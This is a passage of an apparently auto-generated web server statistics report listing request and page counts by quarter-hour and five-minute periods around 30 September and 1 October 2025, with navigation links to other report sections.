30/Sep/25 05:45–06:00 | 222 | 96 | ![]() ![]() |
30/Sep/25 06:00–06:15 | 242 | 142 | ![]() ![]() ![]() ![]() |
30/Sep/25 06:15–06:30 | 228 | 134 | ![]() ![]() ![]() |
30/Sep/25 06:30–06:45 | 212 | 136 | ![]() ![]() ![]() |
30/Sep/25 06:45–07:00 | 242 | 144 | ![]() ![]() ![]() ![]() |
30/Sep/25 07:00–07:15 | 240 | 148 | ![]() ![]() ![]() ![]() |
30/Sep/25 07:15–07:30 | 274 | 142 | ![]() ![]() ![]() ![]() |
30/Sep/25 07:30–07:45 | 294 | 146 | ![]() ![]() ![]() ![]() |
30/Sep/25 07:45–08:00 | 258 | 146 | ![]() ![]() ![]() ![]() |
30/Sep/25 08:00–08:15 | 208 | 104 | ![]() ![]() ![]() |
30/Sep/25 08:15–08:30 | 322 | 134 | ![]() ![]() ![]() |
30/Sep/25 08:30–08:45 | 274 | 146 | ![]() ![]() ![]() ![]() |
30/Sep/25 08:45–09:00 | 612 | 112 | ![]() ![]() |
30/Sep/25 09:00–09:15 | 264 | 126 | ![]() ![]() ![]() |
30/Sep/25 09:15–09:30 | 222 | 128 | ![]() ![]() ![]() |
30/Sep/25 09:30–09:45 | 202 | 110 | ![]() ![]() ![]() |
30/Sep/25 09:45–10:00 | 350 | 130 | ![]() ![]() ![]() |
30/Sep/25 10:00–10:15 | 192 | 104 | ![]() ![]() ![]() |
30/Sep/25 10:15–10:30 | 330 | 120 | ![]() ![]() |
30/Sep/25 10:30–10:45 | 212 | 106 | ![]() ![]() ![]() |
30/Sep/25 10:45–11:00 | 190 | 112 | ![]() ![]() |
30/Sep/25 11:00–11:15 | 264 | 126 | ![]() ![]() ![]() |
30/Sep/25 11:15–11:30 | 216 | 110 | ![]() ![]() ![]() |
30/Sep/25 11:30–11:45 | 282 | 124 | ![]() ![]() ![]() |
30/Sep/25 11:45–12:00 | 458 | 246 | ![]() ![]() ![]() |
30/Sep/25 12:00–12:15 | 246 | 144 | ![]() ![]() ![]() ![]() |
30/Sep/25 12:15–12:30 | 242 | 134 | ![]() ![]() ![]() |
30/Sep/25 12:30–12:45 | 266 | 142 | ![]() ![]() ![]() ![]() |
30/Sep/25 12:45–13:00 | 290 | 162 | ![]() ![]() |
30/Sep/25 13:00–13:15 | 254 | 132 | ![]() ![]() ![]() |
30/Sep/25 13:15–13:30 | 300 | 148 | ![]() ![]() ![]() ![]() |
30/Sep/25 13:30–13:45 | 234 | 128 | ![]() ![]() ![]() |
30/Sep/25 13:45–14:00 | 330 | 196 | ![]() ![]() |
30/Sep/25 14:00–14:15 | 348 | 150 | ![]() ![]() ![]() ![]() |
30/Sep/25 14:15–14:30 | 214 | 106 | ![]() ![]() ![]() |
30/Sep/25 14:30–14:45 | 284 | 162 | ![]() ![]() |
30/Sep/25 14:45–15:00 | 258 | 132 | ![]() ![]() ![]() |
30/Sep/25 15:00–15:15 | 280 | 110 | ![]() ![]() ![]() |
30/Sep/25 15:15–15:30 | 246 | 132 | ![]() ![]() ![]() |
30/Sep/25 15:30–15:45 | 312 | 166 | ![]() ![]() |
30/Sep/25 15:45–16:00 | 284 | 114 | ![]() ![]() |
30/Sep/25 16:00–16:15 | 378 | 108 | ![]() ![]() ![]() |
30/Sep/25 16:15–16:30 | 434 | 168 | ![]() ![]() |
30/Sep/25 16:30–16:45 | 314 | 164 | ![]() ![]() |
30/Sep/25 16:45–17:00 | 274 | 120 | ![]() ![]() |
30/Sep/25 17:00–17:15 | 306 | 202 | ![]() ![]() ![]() |
30/Sep/25 17:15–17:30 | 304 | 168 | ![]() ![]() |
30/Sep/25 17:30–17:45 | 340 | 166 | ![]() ![]() |
30/Sep/25 17:45–18:00 | 302 | 168 | ![]() ![]() |
30/Sep/25 18:00–18:15 | 314 | 138 | ![]() ![]() ![]() |
30/Sep/25 18:15–18:30 | 294 | 172 | ![]() ![]() |
30/Sep/25 18:30–18:45 | 308 | 110 | ![]() ![]() ![]() |
30/Sep/25 18:45–19:00 | 288 | 140 | ![]() ![]() ![]() |
30/Sep/25 19:00–19:15 | 184 | 114 | ![]() ![]() |
30/Sep/25 19:15–19:30 | 260 | 126 | ![]() ![]() ![]() |
30/Sep/25 19:30–19:45 | 214 | 118 | ![]() ![]() |
30/Sep/25 19:45–20:00 | 268 | 170 | ![]() ![]() |
30/Sep/25 20:00–20:15 | 278 | 116 | ![]() ![]() |
30/Sep/25 20:15–20:30 | 388 | 166 | ![]() ![]() |
30/Sep/25 20:30–20:45 | 328 | 188 | ![]() ![]() ![]() |
30/Sep/25 20:45–21:00 | 318 | 166 | ![]() ![]() |
30/Sep/25 21:00–21:15 | 306 | 156 | ![]() |
30/Sep/25 21:15–21:30 | 296 | 172 | ![]() ![]() |
30/Sep/25 21:30–21:45 | 268 | 162 | ![]() ![]() |
30/Sep/25 21:45–22:00 | 382 | 130 | ![]() ![]() ![]() |
30/Sep/25 22:00–22:15 | 302 | 158 | ![]() |
30/Sep/25 22:15–22:30 | 310 | 146 | ![]() ![]() ![]() ![]() |
30/Sep/25 22:30–22:45 | 408 | 188 | ![]() ![]() ![]() |
30/Sep/25 22:45–23:00 | 330 | 136 | ![]() ![]() ![]() |
30/Sep/25 23:00–23:15 | 336 | 246 | ![]() ![]() ![]() |
30/Sep/25 23:15–23:30 | 292 | 214 | ![]() ![]() ![]() |
30/Sep/25 23:30–23:45 | 300 | 202 | ![]() ![]() ![]() |
30/Sep/25 23:45–24:00 | 296 | 210 | ![]() ![]() ![]() |
1/Oct/25 00:00–00:15 | 300 | 222 | ![]() ![]() ![]() ![]() |
1/Oct/25 00:15–00:30 | 220 | 132 | ![]() ![]() ![]() |
1/Oct/25 00:30–00:45 | 202 | 120 | ![]() ![]() |
1/Oct/25 00:45–01:00 | 202 | 100 | ![]() ![]() |
1/Oct/25 01:00–01:15 | 196 | 108 | ![]() ![]() ![]() |
1/Oct/25 01:15–01:30 | 242 | 122 | ![]() ![]() ![]() |
1/Oct/25 01:30–01:45 | 192 | 110 | ![]() ![]() ![]() |
1/Oct/25 01:45–02:00 | 192 | 114 | ![]() ![]() |
1/Oct/25 02:00–02:15 | 262 | 108 | ![]() ![]() ![]() |
1/Oct/25 02:15–02:30 | 88 | 48 | ![]() ![]() |
Busiest quarter of an hour: 14/Sep/25 15:15–15:30 (2,514 requests for pages).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the total activity for each quarter-hour period of the day, summed over all the days in the report.
Each unit () represents 150 requests for pages or part thereof.
time | reqs | pages | |
---|---|---|---|
00:00–00:15 | 6229 | 3382 | ![]() ![]() ![]() ![]() |
00:15–00:30 | 5613 | 3220 | ![]() ![]() ![]() |
00:30–00:45 | 6000 | 3404 | ![]() ![]() ![]() ![]() |
00:45–01:00 | 5882 | 3455 | ![]() ![]() |
01:00–01:15 | 6045 | 3464 | ![]() ![]() |
01:15–01:30 | 5891 | 3211 | ![]() ![]() ![]() |
01:30–01:45 | 5668 | 3093 | ![]() ![]() ![]() |
01:45–02:00 | 6123 | 3330 | ![]() ![]() ![]() ![]() |
02:00–02:15 | 6462 | 3474 | ![]() ![]() |
02:15–02:30 | 5792 | 3061 | ![]() ![]() ![]() |
02:30–02:45 | 5827 | 3258 | ![]() ![]() ![]() |
02:45–03:00 | 5547 | 3339 | ![]() ![]() ![]() ![]() |
03:00–03:15 | 5984 | 3495 | ![]() ![]() |
03:15–03:30 | 5535 | 3371 | ![]() ![]() ![]() ![]() |
03:30–03:45 | 6588 | 3642 | ![]() ![]() ![]() |
03:45–04:00 | 6251 | 3760 | ![]() ![]() ![]() |
04:00–04:15 | 6579 | 3850 | ![]() ![]() ![]() |
04:15–04:30 | 6670 | 4193 | ![]() ![]() ![]() |
04:30–04:45 | 6928 | 4552 | ![]() ![]() ![]() ![]() ![]() |
04:45–05:00 | 6775 | 4193 | ![]() ![]() ![]() |
05:00–05:15 | 7902 | 4786 | ![]() |
05:15–05:30 | 6581 | 4216 | ![]() ![]() ![]() ![]() |
05:30–05:45 | 6542 | 4377 | ![]() ![]() ![]() ![]() |
05:45–06:00 | 6588 | 4466 | ![]() ![]() ![]() ![]() |
06:00–06:15 | 7280 | 4754 | ![]() |
06:15–06:30 | 6153 | 4115 | ![]() ![]() ![]() |
06:30–06:45 | 6400 | 4082 | ![]() ![]() ![]() |
06:45–07:00 | 7183 | 4314 | ![]() ![]() ![]() ![]() |
07:00–07:15 | 6943 | 4588 | ![]() ![]() ![]() ![]() ![]() |
07:15–07:30 | 6911 | 4476 | ![]() ![]() ![]() ![]() |
07:30–07:45 | 6666 | 4139 | ![]() ![]() ![]() |
07:45–08:00 | 5214 | 3174 | ![]() ![]() ![]() |
08:00–08:15 | 5672 | 3447 | ![]() ![]() ![]() ![]() |
08:15–08:30 | 5399 | 3140 | ![]() ![]() ![]() |
08:30–08:45 | 5153 | 3278 | ![]() ![]() ![]() |
08:45–09:00 | 5991 | 3448 | ![]() ![]() ![]() ![]() |
09:00–09:15 | 5968 | 3731 | ![]() ![]() ![]() |
09:15–09:30 | 7316 | 4389 | ![]() ![]() ![]() ![]() |
09:30–09:45 | 6025 | 3717 | ![]() ![]() ![]() |
09:45–10:00 | 5726 | 3555 | ![]() ![]() |
10:00–10:15 | 5793 | 3545 | ![]() ![]() |
10:15–10:30 | 6180 | 3854 | ![]() ![]() ![]() |
10:30–10:45 | 5784 | 3675 | ![]() ![]() ![]() |
10:45–11:00 | 5884 | 3571 | ![]() ![]() |
11:00–11:15 | 5786 | 3494 | ![]() ![]() |
11:15–11:30 | 5109 | 2990 | ![]() ![]() |
11:30–11:45 | 5766 | 3196 | ![]() ![]() ![]() |
11:45–12:00 | 5852 | 3144 | ![]() ![]() ![]() |
12:00–12:15 | 5924 | 3264 | ![]() ![]() ![]() |
12:15–12:30 | 5379 | 2954 | ![]() ![]() |
12:30–12:45 | 5092 | 3110 | ![]() ![]() ![]() |
12:45–13:00 | 5613 | 3123 | ![]() ![]() ![]() |
13:00–13:15 | 5543 | 3114 | ![]() ![]() ![]() |
13:15–13:30 | 5040 | 3060 | ![]() ![]() ![]() |
13:30–13:45 | 4801 | 2851 | ![]() ![]() |
13:45–14:00 | 5120 | 3006 | ![]() ![]() ![]() |
14:00–14:15 | 5371 | 3103 | ![]() ![]() ![]() |
14:15–14:30 | 5233 | 3114 | ![]() ![]() ![]() |
14:30–14:45 | 6053 | 3150 | ![]() ![]() ![]() |
14:45–15:00 | 5194 | 3083 | ![]() ![]() ![]() |
15:00–15:15 | 5390 | 2910 | ![]() ![]() |
15:15–15:30 | 8378 | 5407 | ![]() ![]() ![]() |
15:30–15:45 | 5352 | 3353 | ![]() ![]() ![]() ![]() |
15:45–16:00 | 6608 | 4082 | ![]() ![]() ![]() |
16:00–16:15 | 5294 | 3213 | ![]() ![]() ![]() |
16:15–16:30 | 5404 | 3078 | ![]() ![]() ![]() |
16:30–16:45 | 5794 | 3039 | ![]() ![]() ![]() |
16:45–17:00 | 5032 | 3027 | ![]() ![]() ![]() |
17:00–17:15 | 5694 | 3678 | ![]() ![]() ![]() |
17:15–17:30 | 6720 | 4267 | ![]() ![]() ![]() ![]() |
17:30–17:45 | 5409 | 2944 | ![]() ![]() |
17:45–18:00 | 4987 | 2877 | ![]() ![]() |
18:00–18:15 | 4891 | 2932 | ![]() ![]() |
18:15–18:30 | 5025 | 3060 | ![]() ![]() ![]() |
18:30–18:45 | 5071 | 2815 | ![]() ![]() ![]() |
18:45–19:00 | 5139 | 3023 | ![]() ![]() ![]() |
19:00–19:15 | 4592 | 2943 | ![]() ![]() |
19:15–19:30 | 5137 | 2984 | ![]() ![]() |
19:30–19:45 | 5686 | 2959 | ![]() ![]() |
19:45–20:00 | 5710 | 3337 | ![]() ![]() ![]() ![]() |
20:00–20:15 | 5351 | 3180 | ![]() ![]() ![]() |
20:15–20:30 | 6296 | 3299 | ![]() ![]() ![]() |
20:30–20:45 | 5267 | 2915 | ![]() ![]() |
20:45–21:00 | 5392 | 3028 | ![]() ![]() ![]() |
21:00–21:15 | 4718 | 2668 | ![]() ![]() |
21:15–21:30 | 4885 | 2826 | ![]() ![]() ![]() |
21:30–21:45 | 4644 | 2691 | ![]() ![]() |
21:45–22:00 | 5453 | 2860 | ![]() ![]() |
22:00–22:15 | 5279 | 2817 | ![]() ![]() ![]() |
22:15–22:30 | 5840 | 3141 | ![]() ![]() ![]() |
22:30–22:45 | 5690 | 3613 | ![]() ![]() ![]() |
22:45–23:00 | 5794 | 3356 | ![]() ![]() ![]() ![]() |
23:00–23:15 | 5343 | 3065 | ![]() ![]() ![]() |
23:15–23:30 | 5982 | 3395 | ![]() ![]() ![]() ![]() |
23:30–23:45 | 5868 | 3529 | ![]() ![]() |
23:45–24:00 | 5871 | 3356 | ![]() ![]() ![]() ![]() |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the activity in each five-minute period.
Each unit () represents 5 requests for pages or part thereof.
time | reqs | pages | |
---|---|---|---|
30/Sep/25 02:25–02:30 | 84 | 38 | ![]() |
30/Sep/25 02:30–02:35 | 86 | 54 | ![]() ![]() ![]() |
30/Sep/25 02:35–02:40 | 80 | 30 | ![]() ![]() |
30/Sep/25 02:40–02:45 | 104 | 60 | ![]() ![]() |
30/Sep/25 02:45–02:50 | 98 | 54 | ![]() ![]() ![]() |
30/Sep/25 02:50–02:55 | 96 | 54 | ![]() ![]() ![]() |
30/Sep/25 02:55–03:00 | 74 | 36 | ![]() |
30/Sep/25 03:00–03:05 | 68 | 32 | ![]() ![]() ![]() |
30/Sep/25 03:05–03:10 | 116 | 50 | ![]() ![]() |
30/Sep/25 03:10–03:15 | 82 | 44 | ![]() ![]() |
30/Sep/25 03:15–03:20 | 68 | 28 | ![]() ![]() |
30/Sep/25 03:20–03:25 | 70 | 42 | ![]() ![]() |
30/Sep/25 03:25–03:30 | 84 | 42 | ![]() ![]() |
30/Sep/25 03:30–03:35 | 70 | 42 | ![]() ![]() |
30/Sep/25 03:35–03:40 | 66 | 36 | ![]() |
30/Sep/25 03:40–03:45 | 64 | 26 | ![]() ![]() |
30/Sep/25 03:45–03:50 | 66 | 40 | ![]() |
30/Sep/25 03:50–03:55 | 84 | 44 | ![]() ![]() |
30/Sep/25 03:55–04:00 | 64 | 32 | ![]() ![]() ![]() |
30/Sep/25 04:00–04:05 | 62 | 34 | ![]() ![]() ![]() |
30/Sep/25 04:05–04:10 | 114 | 56 | ![]() ![]() |
30/Sep/25 04:10–04:15 | 90 | 46 | ![]() ![]() |
30/Sep/25 04:15–04:20 | 62 | 38 | ![]() |
30/Sep/25 04:20–04:25 | 64 | 26 | ![]() ![]() |
30/Sep/25 04:25–04:30 | 80 | 48 | ![]() ![]() |
30/Sep/25 04:30–04:35 | 62 | 28 | ![]() ![]() |
30/Sep/25 04:35–04:40 | 72 | 40 | ![]() |
30/Sep/25 04:40–04:45 | 92 | 46 | ![]() ![]() |
30/Sep/25 04:45–04:50 | 54 | 28 | ![]() ![]() |
30/Sep/25 04:50–04:55 | 66 | 42 | ![]() ![]() |
30/Sep/25 04:55–05:00 | 52 | 24 | ![]() ![]() |
30/Sep/25 05:00–05:05 | 84 | 38 | ![]() |
30/Sep/25 05:05–05:10 | 82 | 50 | ![]() ![]() |
30/Sep/25 05:10–05:15 | 82 | 46 | ![]() ![]() |
30/Sep/25 05:15–05:20 | 70 | 44 | ![]() ![]() |
30/Sep/25 05:20–05:25 | 94 | 62 | ![]() ![]() ![]() |
30/Sep/25 05:25–05:30 | 78 | 50 | ![]() ![]() |
30/Sep/25 05:30–05:35 | 64 | 30 | ![]() ![]() |
30/Sep/25 05:35–05:40 | 68 | 30 | ![]() ![]() |
30/Sep/25 05:40–05:45 | 70 | 54 | ![]() ![]() ![]() |
30/Sep/25 05:45–05:50 | 76 | 20 | ![]() |
30/Sep/25 05:50–05:55 | 70 | 40 | ![]() |
30/Sep/25 05:55–06:00 | 76 | 36 | ![]() |
30/Sep/25 06:00–06:05 | 82 | 50 | ![]() ![]() |
30/Sep/25 06:05–06:10 | 76 | 34 | ![]() ![]() ![]() |
30/Sep/25 06:10–06:15 | 84 | 58 | ![]() ![]() |
30/Sep/25 06:15–06:20 | 72 | 32 | ![]() ![]() ![]() |
30/Sep/25 06:20–06:25 | 84 | 60 | ![]() ![]() |
30/Sep/25 06:25–06:30 | 72 | 42 | ![]() ![]() |
30/Sep/25 06:30–06:35 | 68 | 50 | ![]() ![]() |
30/Sep/25 06:35–06:40 | 78 | 42 | ![]() ![]() |
30/Sep/25 06:40–06:45 | 66 | 44 | ![]() ![]() |
30/Sep/25 06:45–06:50 | 86 | 50 | ![]() ![]() |
30/Sep/25 06:50–06:55 | 84 | 46 | ![]() ![]() |
30/Sep/25 06:55–07:00 | 72 | 48 | ![]() ![]() |
30/Sep/25 07:00–07:05 | 78 | 42 | ![]() ![]() |
30/Sep/25 07:05–07:10 | 76 | 50 | ![]() ![]() |
30/Sep/25 07:10–07:15 | 86 | 56 | ![]() ![]() |
30/Sep/25 07:15–07:20 | 100 | 48 | ![]() ![]() |
30/Sep/25 07:20–07:25 | 98 | 54 | ![]() ![]() ![]() |
30/Sep/25 07:25–07:30 | 76 | 40 | ![]() |
30/Sep/25 07:30–07:35 | 82 | 44 | ![]() ![]() |
30/Sep/25 07:35–07:40 | 66 | 42 | ![]() ![]() |
30/Sep/25 07:40–07:45 | 146 | 60 | ![]() ![]() |
30/Sep/25 07:45–07:50 | 94 | 48 | ![]() ![]() |
30/Sep/25 07:50–07:55 | 86 | 54 | ![]() ![]() ![]() |
30/Sep/25 07:55–08:00 | 78 | 44 | ![]() ![]() |
30/Sep/25 08:00–08:05 | 70 | 36 | ![]() |
30/Sep/25 08:05–08:10 | 62 | 32 | ![]() ![]() ![]() |
30/Sep/25 08:10–08:15 | 76 | 36 | ![]() |
30/Sep/25 08:15–08:20 | 72 | 44 | ![]() ![]() |
30/Sep/25 08:20–08:25 | 174 | 60 | ![]() ![]() |
30/Sep/25 08:25–08:30 | 76 | 30 | ![]() ![]() |
30/Sep/25 08:30–08:35 | 94 | 46 | ![]() ![]() |
30/Sep/25 08:35–08:40 | 80 | 52 | ![]() ![]() ![]() |
30/Sep/25 08:40–08:45 | 100 | 48 | ![]() ![]() |
30/Sep/25 08:45–08:50 | 82 | 28 | ![]() ![]() |
30/Sep/25 08:50–08:55 | 272 | 42 | ![]() ![]() |
30/Sep/25 08:55–09:00 | 258 | 42 | ![]() ![]() |
30/Sep/25 09:00–09:05 | 134 | 58 | ![]() ![]() |
30/Sep/25 09:05–09:10 | 64 | 36 | ![]() |
30/Sep/25 09:10–09:15 | 66 | 32 | ![]() ![]() ![]() |
30/Sep/25 09:15–09:20 | 80 | 46 | ![]() ![]() |
30/Sep/25 09:20–09:25 | 66 | 46 | ![]() ![]() |
30/Sep/25 09:25–09:30 | 76 | 36 | ![]() |
30/Sep/25 09:30–09:35 | 60 | 32 | ![]() ![]() ![]() |
30/Sep/25 09:35–09:40 | 68 | 38 | ![]() |
30/Sep/25 09:40–09:45 | 74 | 40 | ![]() |
30/Sep/25 09:45–09:50 | 206 | 50 | ![]() ![]() |
30/Sep/25 09:50–09:55 | 78 | 38 | ![]() |
30/Sep/25 09:55–10:00 | 66 | 42 | ![]() ![]() |
30/Sep/25 10:00–10:05 | 60 | 36 | ![]() |
30/Sep/25 10:05–10:10 | 62 | 34 | ![]() ![]() ![]() |
30/Sep/25 10:10–10:15 | 70 | 34 | ![]() ![]() ![]() |
30/Sep/25 10:15–10:20 | 138 | 32 | ![]() ![]() ![]() |
30/Sep/25 10:20–10:25 | 78 | 42 | ![]() ![]() |
30/Sep/25 10:25–10:30 | 114 | 46 | ![]() ![]() |
30/Sep/25 10:30–10:35 | 68 | 30 | ![]() ![]() |
30/Sep/25 10:35–10:40 | 78 | 52 | ![]() ![]() ![]() |
30/Sep/25 10:40–10:45 | 66 | 24 | ![]() ![]() |
30/Sep/25 10:45–10:50 | 48 | 32 | ![]() ![]() ![]() |
30/Sep/25 10:50–10:55 | 66 | 48 | ![]() ![]() |
30/Sep/25 10:55–11:00 | 76 | 32 | ![]() ![]() ![]() |
30/Sep/25 11:00–11:05 | 126 | 46 | ![]() ![]() |
30/Sep/25 11:05–11:10 | 70 | 40 | ![]() |
30/Sep/25 11:10–11:15 | 68 | 40 | ![]() |
30/Sep/25 11:15–11:20 | 76 | 38 | ![]() |
30/Sep/25 11:20–11:25 | 76 | 46 | ![]() ![]() |
30/Sep/25 11:25–11:30 | 64 | 26 | ![]() ![]() |
30/Sep/25 11:30–11:35 | 94 | 38 | ![]() |
30/Sep/25 11:35–11:40 | 72 | 34 | ![]() ![]() ![]() |
30/Sep/25 11:40–11:45 | 116 | 52 | ![]() ![]() ![]() |
30/Sep/25 11:45–11:50 | 116 | 68 | ![]() ![]() ![]() |
30/Sep/25 11:50–11:55 | 242 | 128 | ![]() ![]() ![]() |
30/Sep/25 11:55–12:00 | 100 | 50 | ![]() ![]() |
30/Sep/25 12:00–12:05 | 96 | 52 | ![]() ![]() ![]() |
30/Sep/25 12:05–12:10 | 72 | 46 | ![]() ![]() |
30/Sep/25 12:10–12:15 | 78 | 46 | ![]() ![]() |
30/Sep/25 12:15–12:20 | 76 | 40 | ![]() |
30/Sep/25 12:20–12:25 | 76 | 46 | ![]() ![]() |
30/Sep/25 12:25–12:30 | 90 | 48 | ![]() ![]() |
30/Sep/25 12:30–12:35 | 76 | 42 | ![]() ![]() |
30/Sep/25 12:35–12:40 | 88 | 44 | ![]() ![]() |
30/Sep/25 12:40–12:45 | 102 | 56 | ![]() ![]() |
30/Sep/25 12:45–12:50 | 106 | 68 | ![]() ![]() ![]() |
30/Sep/25 12:50–12:55 | 90 | 48 | ![]() ![]() |
30/Sep/25 12:55–13:00 | 94 | 46 | ![]() ![]() |
30/Sep/25 13:00–13:05 | 72 | 32 | ![]() ![]() ![]() |
30/Sep/25 13:05–13:10 | 90 | 44 | ![]() ![]() |
30/Sep/25 13:10–13:15 | 92 | 56 | ![]() ![]() |
30/Sep/25 13:15–13:20 | 112 | 56 | ![]() ![]() |
30/Sep/25 13:20–13:25 | 96 | 38 | ![]() |
30/Sep/25 13:25–13:30 | 92 | 54 | ![]() ![]() ![]() |
30/Sep/25 13:30–13:35 | 76 | 48 | ![]() ![]() |
30/Sep/25 13:35–13:40 | 78 | 36 | ![]() |
30/Sep/25 13:40–13:45 | 80 | 44 | ![]() ![]() |
30/Sep/25 13:45–13:50 | 108 | 66 | ![]() ![]() ![]() |
30/Sep/25 13:50–13:55 | 122 | 80 | ![]() |
30/Sep/25 13:55–14:00 | 100 | 50 | ![]() ![]() |
30/Sep/25 14:00–14:05 | 118 | 48 | ![]() ![]() |
30/Sep/25 14:05–14:10 | 124 | 48 | ![]() ![]() |
30/Sep/25 14:10–14:15 | 106 | 54 | ![]() ![]() ![]() |
30/Sep/25 14:15–14:20 | 62 | 38 | ![]() |
30/Sep/25 14:20–14:25 | 74 | 40 | ![]() |
30/Sep/25 14:25–14:30 | 78 | 28 | ![]() ![]() |
30/Sep/25 14:30–14:35 | 74 | 36 | ![]() |
30/Sep/25 14:35–14:40 | 114 | 62 | ![]() ![]() ![]() |
30/Sep/25 14:40–14:45 | 96 | 64 | ![]() ![]() ![]() |
30/Sep/25 14:45–14:50 | 72 | 40 | ![]() |
30/Sep/25 14:50–14:55 | 80 | 38 | ![]() |
30/Sep/25 14:55–15:00 | 106 | 54 | ![]() ![]() ![]() |
30/Sep/25 15:00–15:05 | 80 | 26 | ![]() ![]() |
30/Sep/25 15:05–15:10 | 94 | 52 | ![]() ![]() ![]() |
30/Sep/25 15:10–15:15 | 106 | 32 | ![]() ![]() ![]() |
30/Sep/25 15:15–15:20 | 82 | 36 | ![]() |
30/Sep/25 15:20–15:25 | 50 | 32 | ![]() ![]() ![]() |
30/Sep/25 15:25–15:30 | 114 | 64 | ![]() ![]() ![]() |
30/Sep/25 15:30–15:35 | 108 | 58 | ![]() ![]() |
30/Sep/25 15:35–15:40 | 100 | 60 | ![]() ![]() |
30/Sep/25 15:40–15:45 | 104 | 48 | ![]() ![]() |
30/Sep/25 15:45–15:50 | 104 | 30 | ![]() ![]() |
30/Sep/25 15:50–15:55 | 86 | 46 | ![]() ![]() |
30/Sep/25 15:55–16:00 | 94 | 38 | ![]() |
30/Sep/25 16:00–16:05 | 150 | 38 | ![]() |
30/Sep/25 16:05–16:10 | 98 | 30 | ![]() ![]() |
30/Sep/25 16:10–16:15 | 130 | 40 | ![]() |
30/Sep/25 16:15–16:20 | 150 | 56 | ![]() ![]() |
30/Sep/25 16:20–16:25 | 120 | 48 | ![]() ![]() |
30/Sep/25 16:25–16:30 | 164 | 64 | ![]() ![]() ![]() |
30/Sep/25 16:30–16:35 | 108 | 74 | ![]() ![]() ![]() ![]() |
30/Sep/25 16:35–16:40 | 104 | 58 | ![]() ![]() |
30/Sep/25 16:40–16:45 | 102 | 32 | ![]() ![]() ![]() |
30/Sep/25 16:45–16:50 | 82 | 38 | ![]() |
30/Sep/25 16:50–16:55 | 104 | 44 | ![]() ![]() |
30/Sep/25 16:55–17:00 | 88 | 38 | ![]() |
30/Sep/25 17:00–17:05 | 94 | 58 | ![]() ![]() |
30/Sep/25 17:05–17:10 | 106 | 68 | ![]() ![]() ![]() |
30/Sep/25 17:10–17:15 | 106 | 76 | ![]() |
30/Sep/25 17:15–17:20 | 128 | 82 | ![]() ![]() |
30/Sep/25 17:20–17:25 | 90 | 48 | ![]() ![]() |
30/Sep/25 17:25–17:30 | 86 | 38 | ![]() |
30/Sep/25 17:30–17:35 | 120 | 42 | ![]() ![]() |
30/Sep/25 17:35–17:40 | 110 | 46 | ![]() ![]() |
30/Sep/25 17:40–17:45 | 110 | 78 | ![]() |
30/Sep/25 17:45–17:50 | 110 | 54 | ![]() ![]() ![]() |
30/Sep/25 17:50–17:55 | 102 | 68 | ![]() ![]() ![]() |
30/Sep/25 17:55–18:00 | 90 | 46 | ![]() ![]() |
30/Sep/25 18:00–18:05 | 88 | 34 | ![]() ![]() ![]() |
30/Sep/25 18:05–18:10 | 108 | 44 | ![]() ![]() |
30/Sep/25 18:10–18:15 | 118 | 60 | ![]() ![]() |
30/Sep/25 18:15–18:20 | 92 | 60 | ![]() ![]() |
30/Sep/25 18:20–18:25 | 104 | 52 | ![]() ![]() ![]() |
30/Sep/25 18:25–18:30 | 98 | 60 | ![]() ![]() |
30/Sep/25 18:30–18:35 | 114 | 36 | ![]() |
30/Sep/25 18:35–18:40 | 94 | 34 | ![]() ![]() ![]() |
30/Sep/25 18:40–18:45 | 100 | 40 | ![]() |
30/Sep/25 18:45–18:50 | 114 | 40 | ![]() |
30/Sep/25 18:50–18:55 | 86 | 52 | ![]() ![]() ![]() |
30/Sep/25 18:55–19:00 | 88 | 48 | ![]() ![]() |
30/Sep/25 19:00–19:05 | 48 | 34 | ![]() ![]() ![]() |
30/Sep/25 19:05–19:10 | 60 | 38 | ![]() |
30/Sep/25 19:10–19:15 | 76 | 42 | ![]() ![]() |
30/Sep/25 19:15–19:20 | 78 | 44 | ![]() ![]() |
30/Sep/25 19:20–19:25 | 112 | 38 | ![]() |
30/Sep/25 19:25–19:30 | 70 | 44 | ![]() ![]() |
30/Sep/25 19:30–19:35 | 80 | 38 | ![]() |
30/Sep/25 19:35–19:40 | 74 | 44 | ![]() ![]() |
30/Sep/25 19:40–19:45 | 60 | 36 | ![]() |
30/Sep/25 19:45–19:50 | 86 | 58 | ![]() ![]() |
30/Sep/25 19:50–19:55 | 96 | 54 | ![]() ![]() ![]() |
30/Sep/25 19:55–20:00 | 86 | 58 | ![]() ![]() |
30/Sep/25 20:00–20:05 | 96 | 34 | ![]() ![]() ![]() |
30/Sep/25 20:05–20:10 | 90 | 34 | ![]() ![]() ![]() |
30/Sep/25 20:10–20:15 | 92 | 48 | ![]() ![]() |
30/Sep/25 20:15–20:20 | 110 | 44 | ![]() ![]() |
30/Sep/25 20:20–20:25 | 130 | 44 | ![]() ![]() |
30/Sep/25 20:25–20:30 | 148 | 78 | ![]() |
30/Sep/25 20:30–20:35 | 118 | 62 | ![]() ![]() ![]() |
30/Sep/25 20:35–20:40 | 108 | 70 | ![]() ![]() ![]() |
30/Sep/25 20:40–20:45 | 102 | 56 | ![]() ![]() |
30/Sep/25 20:45–20:50 | 110 | 64 | ![]() ![]() ![]() |
30/Sep/25 20:50–20:55 | 106 | 48 | ![]() ![]() |
30/Sep/25 20:55–21:00 | 102 | 54 | ![]() ![]() ![]() |
30/Sep/25 21:00–21:05 | 100 | 60 | ![]() ![]() |
30/Sep/25 21:05–21:10 | 96 | 60 | ![]() ![]() |
30/Sep/25 21:10–21:15 | 110 | 36 | ![]() |
